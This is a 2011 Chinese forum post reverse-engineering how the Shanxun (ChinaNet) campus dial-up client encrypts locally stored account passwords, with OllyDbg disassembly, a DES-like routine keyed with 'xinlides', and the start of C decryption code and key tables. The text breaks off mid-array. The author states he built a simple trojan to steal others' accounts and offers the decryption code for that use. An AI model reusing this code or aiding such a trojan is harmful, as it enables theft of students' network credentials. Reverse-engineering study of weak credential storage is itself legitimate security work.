首页
论坛
专栏
课程

[调试逆向] [原创]闪讯客户端本地密码加密算法分析

2011-7-4 18:36 17373

[调试逆向] [原创]闪讯客户端本地密码加密算法分析

2011-7-4 18:36
17373
在浙江上大学的同学们肯定都对闪讯恨之入骨吧,在学校里上网只能用闪讯,这么贵,还不允许路由,正好响应超版狼大人的号召,来发篇原创,无奈本人技术太菜。。请大牛勿笑。。
在这里先给自己的blog打个小广告。希望杭电的同学看到以后能请我吃个饭
http://www.kkmonster.com/    (李醒涵)
直接拿出客户端看看
先看看PE结构,结果悲剧了,用VMP处理过的,我也懒得直接去看了,VMP我搞不定呀!!
平时用闪讯的时候会注意到,当触发密码编辑框的killfocus消息时,输入的密码会被加密,长度变了14位的一个字符串
OD加载之,搞不定壳,直接F9跑起来。。。分析之
00413020    53              push    ebx
00413021    56              push    esi
00413022    57              push    edi
00413023    8B7C24 10       mov     edi, dword ptr [esp+10]
00413027    8BF1            mov     esi, ecx
00413029    57              push    edi
0041302A    E8 11E1FEFF     call    00401140
0041302F    8D86 E4250000   lea     eax, dword ptr [esi+25E4]
00413035    50              push    eax
00413036    68 17040000     push    417
0041303B    57              push    edi
0041303C    E8 73590200     call    004389B4
00413041    8D8E B8260000   lea     ecx, dword ptr [esi+26B8]
00413047    51              push    ecx
00413048    68 16040000     push    416
0041304D    57              push    edi
0041304E    E8 61590200     call    004389B4
00413053    8D96 30270000   lea     edx, dword ptr [esi+2730]
00413059    52              push    edx
0041305A    68 15040000     push    415
0041305F    57              push    edi
00413060    E8 4F590200     call    004389B4
00413065    8D86 A8270000   lea     eax, dword ptr [esi+27A8]
0041306B    50              push    eax
0041306C    68 14040000     push    414
00413071    57              push    edi
00413072    E8 3D590200     call    004389B4
00413077    8D8E 20280000   lea     ecx, dword ptr [esi+2820]
0041307D    51              push    ecx
0041307E    68 11040000     push    411
00413083    57              push    edi
00413084    E8 2B590200     call    004389B4
00413089    8D96 60280000   lea     edx, dword ptr [esi+2860]
0041308F    52              push    edx
00413090    68 0E040000     push    40E
00413095    57              push    edi
00413096    E8 19590200     call    004389B4
0041309B    8D86 14290000   lea     eax, dword ptr [esi+2914]
004130A1    50              push    eax
004130A2    68 F2030000     push    3F2
004130A7    57              push    edi
004130A8    E8 07590200     call    004389B4
004130AD    8D8E 8C290000   lea     ecx, dword ptr [esi+298C]
004130B3    51              push    ecx
004130B4    68 03040000     push    403
004130B9    57              push    edi
004130BA    E8 F5580200     call    004389B4
004130BF    8D9E CC290000   lea     ebx, dword ptr [esi+29CC]
004130C5    53              push    ebx
004130C6    68 F1030000     push    3F1
004130CB    57              push    edi
004130CC    E8 875A0200     call    00438B58                         ; 获取密码框内容
004130D1    6A 1E           push    1E
004130D3    53              push    ebx
004130D4    57              push    edi
004130D5    E8 785A0200     call    00438B52
004130DA    8D96 D0290000   lea     edx, dword ptr [esi+29D0]
004130E0    52              push    edx
004130E1    68 F5030000     push    3F5
004130E6    57              push    edi
004130E7    E8 605A0200     call    00438B4C
004130EC    8D86 D4290000   lea     eax, dword ptr [esi+29D4]
004130F2    50              push    eax
004130F3    68 F9030000     push    3F9
004130F8    57              push    edi
004130F9    E8 5A5A0200     call    00438B58
004130FE    8D8E D8290000   lea     ecx, dword ptr [esi+29D8]
00413104    51              push    ecx
00413105    68 0D040000     push    40D
0041310A    57              push    edi
0041310B    E8 3C5A0200     call    00438B4C
00413110    81C6 DC290000   add     esi, 29DC
00413116    56              push    esi
00413117    68 12040000     push    412
0041311C    57              push    edi
0041311D    E8 365A0200     call    00438B58
00413122    5F              pop     edi
00413123    5E              pop     esi
00413124    5B              pop     ebx
00413125    C2 0400         retn    4

注意这里,004130CC处调用过程来获取编辑框的内容
看看寄存器里的数据:
EAX 010633E8 ASCII "xinlianxiaohui"
ECX 0012F070
EDX 00000030
EBX 0012F070
ESP 0012B528
EBP 0012B540
ESI 004D2964 NetKeepe.004D2964
EDI 0012F070
EIP 75A370ED USER32.GetWindowTextA
从编辑框里获取到的字符串是xinlianxiaohui,其实到后来我发现这个是骗人的。。不管密码是什么编辑框里的串永远是这个
本来想看看下边的加密算法,进了call后发现全用vmp变形过了,悲剧了,先来看看他把帐号密码保存在哪里吧,监视注册表,发现程序对注册表没有操作,那应该是在文件里了,对CreateFile下断,中断4次后注意堆栈
0012AE18 75CF0BC7 /CALL 到 CreateFileW 来自 kernel32.75CF0BC2
0012AE1C 002A6FA8 |FileName = "C:\ChinaNetSn\bin\ams.nkd"
0012AE20 80000000 |Access = GENERIC_READ
0012AE24 00000000 |ShareMode = 0
0012AE28 0012AEA0 |pSecurity = 0012AEA0
0012AE2C 00000003 |Mode = OPEN_EXISTING
0012AE30 00000080 |Attributes = NORMAL
0012AE34 00000000 \hTemplateFile = NULL

这里程序要使用闪讯目录下的bin\ams.nkd文件
继续看了半天,没有用到其它文件,除了这个和闪讯有点关系以外还有一个Credit文件,别的都是无关痛痒的,我感觉本地的密码应该保存在在这个ams.nkd文件里吧,于是再对WriteFile下断,登录一下,试试,结果登录出现异常,而且WriteFile也没调用,后来证明是被hook掉了
试着用PhantOm把OD给隐藏掉,结果OD遇到特权指令给卡死了,然后OD进程被隐藏了,想关都关不掉,妈的,一个拨号软件放这么多保护要死呀!
悲剧地重启一下机器,仔细想想,决定不看程序了,从文件入手吧!
试着把Credit文件给删了,然后运行OD后发现帐号列表成空了,猜想一下,大概应该就在这个文件里了!
打开文件看看,一堆乱码,晕,加密了还!
重新载入OD,对CreateFile下条件断byte ptr [esp+ 4] == ‘C’运行之,看中段时的堆栈
0012B0DC 75CF0BC7 /CALL 到 CreateFileW 来自 kernel32.75CF0BC2
0012B0E0 001C67E0 |FileName = "Credit"
0012B0E4 80000000 |Access = GENERIC_READ
0012B0E8 00000003 |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
0012B0EC 00000000 |pSecurity = NULL
0012B0F0 00000003 |Mode = OPEN_EXISTING
0012B0F4 00000080 |Attributes = NORMAL
0012B0F8 00000000 \hTemplateFile = NULL

对了,就是这里,没错了,向上返回两层retn,然后看看它返回的文件指针,现在的eax是154,对ReadFile下断吧,中断后再看堆栈里的数据:
0012B0F8 75CEDAFD /CALL 到 ReadFile 来自 kernel32.75CEDAF8
0012B0FC 00000154 |hFile = 00000154 (window)
0012B100 0012D5F4 |Buffer = 0012D5F4
0012B104 0000168C |BytesToRead = 168C (5772.)
0012B108 0012B164 |pBytesRead = 0012B164
0012B10C 00000000 \pOverlapped = NULL

这里看到了,文件指针是154,就是Credit文件了,要读的长度为168C,我们来看看文件的长度,正好一次全部读完,到再单步几句,可以看到这里:
00414CCC /0F84 29010000 je 00414DFB
00414CD2 |68 949E4500 push 00459E94 ; ASCII "EncodeCredit,encode",LF
00414CD7 |E8 5450FFFF call 00409D30

貌似这里是解密算法
这里一个je,直接跳走了,来到这里:
00414DFB 68 7C9E4500 push 00459E7C ; ASCII "EncodeCredit,decode",LF
00414E00 E8 2B4FFFFF call 00409D30

看样子应该是解密的,进去看看,丫丫奶奶的,好乱的代码,妈的,硬着头皮来理解一下吧:
00414E05 8B6C24 18 mov ebp, dword ptr [esp+18] ; 获取缓冲区头
00414E09 83C4 04 add esp, 4 ; 抬高栈顶
00414E0C 897424 18 mov dword ptr [esp+18], esi
00414E10 8B45 00 mov eax, dword ptr [ebp] ; 获取第一位
00414E13 40 inc eax ; 加1
00414E14 85C0 test eax, eax ; 是0?(判断是不是空文件)
00414E16 0F8E C5000000 jle 00414EE1 ; 空刚跳走
00414E1C 8D75 50 lea esi, dword ptr [ebp+50] ; 取第50位的地址
00414E1F 8D4E E0 lea ecx, dword ptr [esi-20] ; 第30位的指针

再往下看就可以发现问题了:
00414E22 6A 20 push 20
00414E24 51 push ecx
00414E25 E8 B6CBFFFF call 004119E0
00414E2A 6A 20 push 20
00414E2C 56 push esi
00414E2D E8 AECBFFFF call 004119E0
00414E32 8D56 20 lea edx, dword ptr [esi+20]
00414E35 6A 10 push 10
00414E37 52 push edx
00414E38 E8 A3CBFFFF call 004119E0
00414E3D 8D46 30 lea eax, dword ptr [esi+30]
00414E40 6A 10 push 10
00414E42 50 push eax
00414E43 E8 98CBFFFF call 004119E0
00414E48 8D4E B8 lea ecx, dword ptr [esi-48]
00414E4B 6A 28 push 28
00414E4D 51 push ecx
00414E4E E8 8DCBFFFF call 004119E0

这里的004119E0函数应该就是解密的了,它有两个参数,第一个参数是需要解密的缓冲区,第二个参数是需要解密的缓冲区长度
不多废话,进去看看:
004119E0 56 push esi
004119E1 6A 01 push 1
004119E3 68 309B4500 push 00459B30 ; ASCII "xinlides"
004119E8 E8 9310FFFF call 00402A80
004119ED 8B4424 14 mov eax, dword ptr [esp+14]
004119F1 8B7424 10 mov esi, dword ptr [esp+10]
004119F5 83C4 08 add esp, 8
004119F8 85C0 test eax, eax
004119FA 7E 18 jle short 00411A14
004119FC 57 push edi
004119FD 8D78 07 lea edi, dword ptr [eax+7]
00411A00 C1EF 03 shr edi, 3
00411A03 56 push esi
00411A04 56 push esi
00411A05 E8 7612FFFF call 00402C80
00411A0A 83C4 08 add esp, 8
00411A0D 83C6 08 add esi, 8
00411A10 4F dec edi
00411A11 ^ 75 F0 jnz short 00411A03

再往里进的话就是不堪入目的代码呀,完全看不懂了,但这里的确是解密的地方,现在看看原来的缓冲区,可以看到乱码已经被还原了,出来了我的帐号。
总结一下解密算法,来模拟一下解密,
它以8位为一组来进行解密,每8位的解密过程按照我的思路来大概还原一下:
00402D30 8B4C24 04 mov ecx, dword ptr [esp+4]
00402D34 8B4424 08 mov eax, dword ptr [esp+8] ; 8位的首地址
00402D38 8B11 mov edx, dword ptr [ecx] ; 获取一个双字到edx
00402D3A 83C1 04 add ecx, 4 ; 修改指针指向下一个双字
00402D3D C1EA 18 shr edx, 18 ; 右移18位
00402D40 8810 mov byte ptr [eax], dl ; 取一个字节为解密的第一位
00402D42 8B51 FC mov edx, dword ptr [ecx-4] ; 取上一个双字
00402D45 40 inc eax ; 8位的第2位
00402D46 C1EA 10 shr edx, 10 ; 右移10位
00402D49 8810 mov byte ptr [eax], dl ; 取一个字节为解密的第2位
00402D4B 8B51 FC mov edx, dword ptr [ecx-4] ; 取上一个双字
00402D4E 40 inc eax ; 8位的第3位
00402D4F C1EA 08 shr edx, 8 ; 右移8位
00402D52 8810 mov byte ptr [eax], dl ; 取一个字节为解密的第3位
00402D54 8A51 FC mov dl, byte ptr [ecx-4] ; 取一个字节
00402D57 40 inc eax ; 8位的第4位
00402D58 8810 mov byte ptr [eax], dl ; 为解密的第4位
00402D5A 8B11 mov edx, dword ptr [ecx] ; 取一个双字
00402D5C 40 inc eax ; 8位的第5位
00402D5D C1EA 18 shr edx, 18 ; 右移18位
00402D60 8810 mov byte ptr [eax], dl ; 取一个字节为解密的第5位
00402D62 8B11 mov edx, dword ptr [ecx] ; 取一个双字
00402D64 40 inc eax ; 8位的第6位
00402D65 C1EA 10 shr edx, 10 ; 右移10位
00402D68 8810 mov byte ptr [eax], dl ; 取一个字节为解密的第6位
00402D6A 8B11 mov edx, dword ptr [ecx] ; 取一个双字
00402D6C 40 inc eax ; 8位的第7位
00402D6D C1EA 08 shr edx, 8 ; 右移8位
00402D70 8810 mov byte ptr [eax], dl ; 取一个字节为解密的第7位
00402D72 8A09 mov cl, byte ptr [ecx] ; 取一个字节
00402D74 8848 01 mov byte ptr [eax+1], cl ; 作为解密的第8位

注释以后就比较容易理解了,但是这里都和第一句获取的地址处取来ecx指针密切相关,可以看到ecx指向一个8位,也就是两个双字,但这8位怎么得到的,再来看
00402CC0 8B4C24 04 mov ecx, dword ptr [esp+4]
00402CC4 33C0 xor eax, eax
00402CC6 56 push esi
00402CC7 8A01 mov al, byte ptr [ecx]
00402CC9 8BD0 mov edx, eax
00402CCB 8B4424 0C mov eax, dword ptr [esp+C]
00402CCF C1E2 18 shl edx, 18
00402CD2 8910 mov dword ptr [eax], edx
00402CD4 8B30 mov esi, dword ptr [eax]
00402CD6 41 inc ecx
00402CD7 33D2 xor edx, edx
00402CD9 83C0 04 add eax, 4
00402CDC 8A11 mov dl, byte ptr [ecx]
00402CDE C1E2 10 shl edx, 10
00402CE1 0BF2 or esi, edx
00402CE3 41 inc ecx
00402CE4 33D2 xor edx, edx
00402CE6 8970 FC mov dword ptr [eax-4], esi
00402CE9 8A31 mov dh, byte ptr [ecx]
00402CEB 0BF2 or esi, edx
00402CED 41 inc ecx
00402CEE 33D2 xor edx, edx
00402CF0 8970 FC mov dword ptr [eax-4], esi
00402CF3 8A11 mov dl, byte ptr [ecx]
00402CF5 0BF2 or esi, edx
00402CF7 41 inc ecx
00402CF8 33D2 xor edx, edx
00402CFA 8970 FC mov dword ptr [eax-4], esi
00402CFD 8A11 mov dl, byte ptr [ecx]
00402CFF C1E2 18 shl edx, 18
00402D02 8910 mov dword ptr [eax], edx
00402D04 8B30 mov esi, dword ptr [eax]
00402D06 41 inc ecx
00402D07 33D2 xor edx, edx
00402D09 8A11 mov dl, byte ptr [ecx]
00402D0B C1E2 10 shl edx, 10
00402D0E 0BF2 or esi, edx
00402D10 41 inc ecx
00402D11 33D2 xor edx, edx
00402D13 8930 mov dword ptr [eax], esi
00402D15 8A31 mov dh, byte ptr [ecx]
00402D17 0BF2 or esi, edx
00402D19 33D2 xor edx, edx
00402D1B 8930 mov dword ptr [eax], esi
00402D1D 8A51 01 mov dl, byte ptr [ecx+1]
00402D20 0BD6 or edx, esi
00402D22 5E pop esi
00402D23 8910 mov dword ptr [eax], edx
00402D25 C3 retn

再看看这里

00402D80 51 push ecx
00402D81 8B4C24 08 mov ecx, dword ptr [esp+8]
00402D85 53 push ebx
00402D86 55 push ebp
00402D87 56 push esi
00402D88 8B01 mov eax, dword ptr [ecx]
00402D8A 8B51 04 mov edx, dword ptr [ecx+4]
00402D8D 8BC8 mov ecx, eax
00402D8F 8BF2 mov esi, edx
00402D91 C1E9 04 shr ecx, 4
00402D94 81E1 0F0F0F>and ecx, 0F0F0F0F
00402D9A 81E6 0F0F0F>and esi, 0F0F0F0F
00402DA0 33CE xor ecx, esi
00402DA2 57 push edi
00402DA3 33D1 xor edx, ecx
00402DA5 C74424 10 0>mov dword ptr [esp+10], 8
00402DAD C1E1 04 shl ecx, 4
00402DB0 33C1 xor eax, ecx
00402DB2 8BF2 mov esi, edx
00402DB4 8BC8 mov ecx, eax
00402DB6 81E6 FFFF00>and esi, 0FFFF
00402DBC C1E9 10 shr ecx, 10
00402DBF 33CE xor ecx, esi
00402DC1 33D1 xor edx, ecx
00402DC3 C1E1 10 shl ecx, 10
00402DC6 33C1 xor eax, ecx
00402DC8 8BCA mov ecx, edx
00402DCA C1E9 02 shr ecx, 2
00402DCD 8BF0 mov esi, eax
00402DCF 81E1 333333>and ecx, 33333333
00402DD5 81E6 333333>and esi, 33333333
00402DDB 33CE xor ecx, esi
00402DDD 33C1 xor eax, ecx
00402DDF C1E1 02 shl ecx, 2
00402DE2 33D1 xor edx, ecx
00402DE4 8BF0 mov esi, eax
00402DE6 8BCA mov ecx, edx
00402DE8 81E6 FF00FF>and esi, 0FF00FF
00402DEE C1E9 08 shr ecx, 8
00402DF1 81E1 FF00FF>and ecx, 0FF00FF
00402DF7 33CE xor ecx, esi
00402DF9 8B7424 1C mov esi, dword ptr [esp+1C]
00402DFD 33C1 xor eax, ecx
00402DFF C1E1 08 shl ecx, 8
00402E02 33D1 xor edx, ecx
00402E04 8BCA mov ecx, edx
00402E06 03D2 add edx, edx
00402E08 C1E9 1F shr ecx, 1F
00402E0B 0BCA or ecx, edx
00402E0D 8BD1 mov edx, ecx
00402E0F 33D0 xor edx, eax
00402E11 81E2 AAAAAA>and edx, AAAAAAAA
00402E17 33C2 xor eax, edx
00402E19 33CA xor ecx, edx
00402E1B 8BD0 mov edx, eax
00402E1D 03C0 add eax, eax
00402E1F C1EA 1F shr edx, 1F
00402E22 0BD0 or edx, eax
00402E24 8B1E mov ebx, dword ptr [esi]
00402E26 8BC1 mov eax, ecx
00402E28 8BF9 mov edi, ecx
00402E2A 83C6 04 add esi, 4
00402E2D C1E0 1C shl eax, 1C
00402E30 C1EF 04 shr edi, 4
00402E33 0BC7 or eax, edi
00402E35 83C6 04 add esi, 4
00402E38 33C3 xor eax, ebx
00402E3A 83C6 04 add esi, 4
00402E3D 8BD8 mov ebx, eax
00402E3F 8BF8 mov edi, eax
00402E41 C1EB 10 shr ebx, 10
00402E44 83E3 3F and ebx, 3F
00402E47 83C6 04 add esi, 4
00402E4A C1EF 18 shr edi, 18
00402E4D 8B2C9D E483>mov ebp, dword ptr [ebx*4+4583E4]
00402E54 8BD8 mov ebx, eax
00402E56 83E7 3F and edi, 3F
00402E59 83E0 3F and eax, 3F
00402E5C C1EB 08 shr ebx, 8
00402E5F 8B3CBD E481>mov edi, dword ptr [edi*4+4581E4]
00402E66 83E3 3F and ebx, 3F
00402E69 0BFD or edi, ebp
00402E6B 8B2C9D E485>mov ebp, dword ptr [ebx*4+4585E4]
00402E72 8B1C85 E487>mov ebx, dword ptr [eax*4+4587E4]
00402E79 8B46 F4 mov eax, dword ptr [esi-C]
00402E7C 0BFD or edi, ebp
00402E7E 33C1 xor eax, ecx
00402E80 0BFB or edi, ebx
00402E82 8BD8 mov ebx, eax
00402E84 8BE8 mov ebp, eax
00402E86 C1EB 18 shr ebx, 18
00402E89 83E3 3F and ebx, 3F
00402E8C C1ED 10 shr ebp, 10
00402E8F 8B1C9D E482>mov ebx, dword ptr [ebx*4+4582E4]
00402E96 83E5 3F and ebp, 3F
00402E99 0B1CAD E484>or ebx, dword ptr [ebp*4+4584E4]
00402EA0 8BE8 mov ebp, eax
00402EA2 C1ED 08 shr ebp, 8
00402EA5 83E5 3F and ebp, 3F
00402EA8 83E0 3F and eax, 3F
00402EAB 0B1CAD E486>or ebx, dword ptr [ebp*4+4586E4]
00402EB2 8B2C85 E488>mov ebp, dword ptr [eax*4+4588E4]
00402EB9 0BDD or ebx, ebp
00402EBB 0BDF or ebx, edi
00402EBD 33D3 xor edx, ebx
00402EBF 8B5E F8 mov ebx, dword ptr [esi-8]
00402EC2 8BC2 mov eax, edx
00402EC4 8BFA mov edi, edx
00402EC6 C1E0 1C shl eax, 1C
00402EC9 C1EF 04 shr edi, 4
00402ECC 0BC7 or eax, edi
00402ECE 33C3 xor eax, ebx
00402ED0 8BD8 mov ebx, eax
00402ED2 8BF8 mov edi, eax
00402ED4 C1EB 10 shr ebx, 10
00402ED7 83E3 3F and ebx, 3F
00402EDA C1EF 18 shr edi, 18
00402EDD 8B2C9D E483>mov ebp, dword ptr [ebx*4+4583E4]
00402EE4 8BD8 mov ebx, eax
00402EE6 83E7 3F and edi, 3F
00402EE9 83E0 3F and eax, 3F
00402EEC C1EB 08 shr ebx, 8
00402EEF 8B3CBD E481>mov edi, dword ptr [edi*4+4581E4]
00402EF6 83E3 3F and ebx, 3F
00402EF9 0BFD or edi, ebp
00402EFB 8B2C9D E485>mov ebp, dword ptr [ebx*4+4585E4]
00402F02 8B1C85 E487>mov ebx, dword ptr [eax*4+4587E4]
00402F09 8B46 FC mov eax, dword ptr [esi-4]
00402F0C 0BFD or edi, ebp
00402F0E 33C2 xor eax, edx
00402F10 0BFB or edi, ebx
00402F12 8BD8 mov ebx, eax
00402F14 8BE8 mov ebp, eax
00402F16 C1EB 18 shr ebx, 18
00402F19 83E3 3F and ebx, 3F
00402F1C C1ED 10 shr ebp, 10
00402F1F 8B1C9D E482>mov ebx, dword ptr [ebx*4+4582E4]
00402F26 83E5 3F and ebp, 3F
00402F29 0B1CAD E484>or ebx, dword ptr [ebp*4+4584E4]
00402F30 8BE8 mov ebp, eax
00402F32 83E0 3F and eax, 3F
00402F35 C1ED 08 shr ebp, 8
00402F38 83E5 3F and ebp, 3F
00402F3B 0B1CAD E486>or ebx, dword ptr [ebp*4+4586E4]
00402F42 8B2C85 E488>mov ebp, dword ptr [eax*4+4588E4]
00402F49 8B4424 10 mov eax, dword ptr [esp+10]
00402F4D 0BDD or ebx, ebp
00402F4F 0BDF or ebx, edi
00402F51 33CB xor ecx, ebx
00402F53 48 dec eax
00402F54 894424 10 mov dword ptr [esp+10], eax
00402F58 ^ 0F85 C6FEFF>jnz 00402E24
00402F5E 8BC1 mov eax, ecx
00402F60 5F pop edi
00402F61 C1E0 1F shl eax, 1F
00402F64 D1E9 shr ecx, 1
00402F66 0BC1 or eax, ecx
00402F68 8BC8 mov ecx, eax
00402F6A 33CA xor ecx, edx
00402F6C 81E1 AAAAAA>and ecx, AAAAAAAA
00402F72 33D1 xor edx, ecx
00402F74 33C1 xor eax, ecx
00402F76 8BCA mov ecx, edx
00402F78 8BF0 mov esi, eax
00402F7A C1E1 1F shl ecx, 1F
00402F7D D1EA shr edx, 1
00402F7F 0BCA or ecx, edx
00402F81 81E6 FF00FF>and esi, 0FF00FF
00402F87 8BD1 mov edx, ecx
00402F89 C1EA 08 shr edx, 8
00402F8C 81E2 FF00FF>and edx, 0FF00FF
00402F92 33D6 xor edx, esi
00402F94 33C2 xor eax, edx
00402F96 C1E2 08 shl edx, 8
00402F99 33CA xor ecx, edx
00402F9B 8BF0 mov esi, eax
00402F9D 8BD1 mov edx, ecx
00402F9F 81E6 333333>and esi, 33333333
00402FA5 C1EA 02 shr edx, 2
00402FA8 81E2 333333>and edx, 33333333
00402FAE 33D6 xor edx, esi
00402FB0 33C2 xor eax, edx
00402FB2 C1E2 02 shl edx, 2
00402FB5 33CA xor ecx, edx
00402FB7 8BD0 mov edx, eax
00402FB9 8BF1 mov esi, ecx
00402FBB C1EA 10 shr edx, 10
00402FBE 81E6 FFFF00>and esi, 0FFFF
00402FC4 33D6 xor edx, esi
00402FC6 33CA xor ecx, edx
00402FC8 C1E2 10 shl edx, 10
00402FCB 33C2 xor eax, edx
00402FCD 8BF1 mov esi, ecx
00402FCF 8BD0 mov edx, eax
00402FD1 81E6 0F0F0F>and esi, 0F0F0F0F
00402FD7 C1EA 04 shr edx, 4
00402FDA 81E2 0F0F0F>and edx, 0F0F0F0F
00402FE0 33D6 xor edx, esi
00402FE2 8BF2 mov esi, edx
00402FE4 C1E6 04 shl esi, 4
00402FE7 33F0 xor esi, eax
00402FE9 8B4424 14 mov eax, dword ptr [esp+14]
00402FED 33D1 xor edx, ecx
00402FEF 8930 mov dword ptr [eax], esi
00402FF1 5E pop esi
00402FF2 5D pop ebp
00402FF3 8950 04 mov dword ptr [eax+4], edx
00402FF6 5B pop ebx
00402FF7 59 pop ecx

这样结果就出来了。
简单的做个马了,盗点闪讯号来自己用用。
不过这个也不值钱。。具体的解密代码发出来大家一起娱乐

char* readdir();
char* readfile();
void encode(char *buffer, int len);
char* encode1(char *buffer);
void encode2(char *buffer, char *key);
void encode3(char *buffer);
void rev(char *p);

char pass[] =
{
0x1E, 0x30, 0x38, 0x3C, 0x1A, 0x09, 0x26, 0x0B, 0x19, 0x10, 0x3A, 0x3C, 0x1A, 0x38, 0x26, 0x0B,
0x21, 0x3D, 0x3A, 0x34, 0x11, 0x0C, 0x2E, 0x1A, 0x2F, 0x03, 0x32, 0x36, 0x22, 0x02, 0x2D, 0x1A,
0x14, 0x29, 0x36, 0x16, 0x26, 0x25, 0x2D, 0x32, 0x00, 0x0E, 0x36, 0x07, 0x0B, 0x2B, 0x0D, 0x36,
0x1B, 0x18, 0x27, 0x07, 0x09, 0x16, 0x1D, 0x36, 0x02, 0x37, 0x27, 0x07, 0x14, 0x0A, 0x19, 0x35,
0x07, 0x15, 0x27, 0x0F, 0x14, 0x01, 0x19, 0x35, 0x28, 0x05, 0x0F, 0x0B, 0x0E, 0x34, 0x1B, 0x35,
0x0C, 0x3A, 0x0D, 0x2B, 0x33, 0x10, 0x1B, 0x3D, 0x32, 0x28, 0x0D, 0x3B, 0x10, 0x33, 0x33, 0x2D,
0x24, 0x00, 0x1D, 0x39, 0x3D, 0x0E, 0x32, 0x2D, 0x23, 0x16, 0x19, 0x39, 0x20, 0x25, 0x36, 0x0F,
0x18, 0x07, 0x39, 0x38, 0x2D, 0x11, 0x36, 0x0B, 0x14, 0x27, 0x39, 0x3C, 0x08, 0x1B, 0x26, 0x0B
};
char key1[] =
{
0x00, 0x04, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x04, 0x01, 0x01,
0x04, 0x00, 0x01, 0x01, 0x04, 0x04, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00,
0x00, 0x04, 0x00, 0x00, 0x00, 0x04, 0x01, 0x01, 0x04, 0x04, 0x01, 0x01, 0x00, 0x04, 0x00, 0x00,
0x04, 0x04, 0x00, 0x01, 0x04, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01, 0x04, 0x00, 0x00, 0x00,
0x04, 0x04, 0x00, 0x00, 0x00, 0x04, 0x00, 0x01, 0x00, 0x04, 0x00, 0x01, 0x00, 0x04, 0x01, 0x00,
0x00, 0x04, 0x01, 0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x01, 0x04, 0x04, 0x00, 0x01,
0x04, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x01, 0x04, 0x00, 0x00, 0x01, 0x04, 0x00, 0x01, 0x00,
0x00, 0x00, 0x00, 0x00, 0x04, 0x04, 0x00, 0x00, 0x04, 0x04, 0x01, 0x00, 0x00, 0x00, 0x00, 0x01,
0x00, 0x00, 0x01, 0x00, 0x04, 0x04, 0x01, 0x01, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x01,
0x00, 0x04, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00,
0x04, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00, 0x00, 0x04, 0x01, 0x00, 0x04, 0x00, 0x00, 0x01,
0x00, 0x04, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x04, 0x04, 0x00, 0x01, 0x04, 0x04, 0x01, 0x00,
0x04, 0x04, 0x01, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x01, 0x04, 0x04, 0x00, 0x01,
0x04, 0x00, 0x00, 0x01, 0x04, 0x04, 0x00, 0x00, 0x04, 0x04, 0x01, 0x00, 0x00, 0x04, 0x01, 0x01,
0x04, 0x04, 0x00, 0x00, 0x00, 0x04, 0x00, 0x01, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
0x04, 0x00, 0x01, 0x00, 0x00, 0x04, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x01, 0x01
};
char key2[] =
{
0x20, 0x80, 0x10, 0x80, 0x00, 0x80, 0x00, 0x80, 0x00, 0x80, 0x00, 0x00, 0x20, 0x80, 0x10, 0x00,
0x00, 0x00, 0x10, 0x00, 0x20, 0x00, 0x00, 0x00, 0x20, 0x00, 0x10, 0x80, 0x20, 0x80, 0x00, 0x80,
0x20, 0x00, 0x00, 0x80, 0x20, 0x80, 0x10, 0x80, 0x00, 0x80, 0x10, 0x80, 0x00, 0x00, 0x00, 0x80,
0x00, 0x80, 0x00, 0x80, 0x00, 0x00, 0x10, 0x00, 0x20, 0x00, 0x00, 0x00, 0x20, 0x00, 0x10, 0x80,
0x00, 0x80, 0x10, 0x00, 0x20, 0x00, 0x10, 0x00, 0x20, 0x80, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x00, 0x00, 0x20, 0x80, 0x10, 0x00, 0x00, 0x00, 0x10, 0x80,
0x20, 0x00, 0x10, 0x00, 0x20, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x10, 0x00,
0x20, 0x80, 0x00, 0x00, 0x00, 0x80, 0x10, 0x80, 0x00, 0x00, 0x10, 0x80, 0x20, 0x80, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x20, 0x80, 0x10, 0x00, 0x20, 0x00, 0x10, 0x80, 0x00, 0x00, 0x10, 0x00,
0x20, 0x80, 0x00, 0x80, 0x00, 0x00, 0x10, 0x80, 0x00, 0x80, 0x10, 0x80, 0x00, 0x80, 0x00, 0x00,
0x00, 0x00, 0x10, 0x80, 0x00, 0x80, 0x00, 0x80, 0x20, 0x00, 0x00, 0x00, 0x20, 0x80, 0x10, 0x80,
0x20, 0x80, 0x10, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80,
0x20, 0x80, 0x00, 0x00, 0x00, 0x80, 0x10, 0x80, 0x00, 0x00, 0x10, 0x00, 0x20, 0x00, 0x00, 0x80,
0x20, 0x00, 0x10, 0x00, 0x20, 0x80, 0x00, 0x80, 0x20, 0x00, 0x00, 0x80, 0x20, 0x00, 0x10, 0x00,
0x00, 0x80, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x20, 0x80, 0x00, 0x00,
0x00, 0x00, 0x00, 0x80, 0x20, 0x00, 0x10, 0x80, 0x20, 0x80, 0x10, 0x80, 0x00, 0x80, 0x10, 0x00
};
char key3[] =
{
0x08, 0x02, 0x00, 0x00, 0x00, 0x02, 0x02, 0x08, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x02, 0x08,
0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00, 0x08, 0x02, 0x02, 0x00, 0x00, 0x02, 0x00, 0x08,
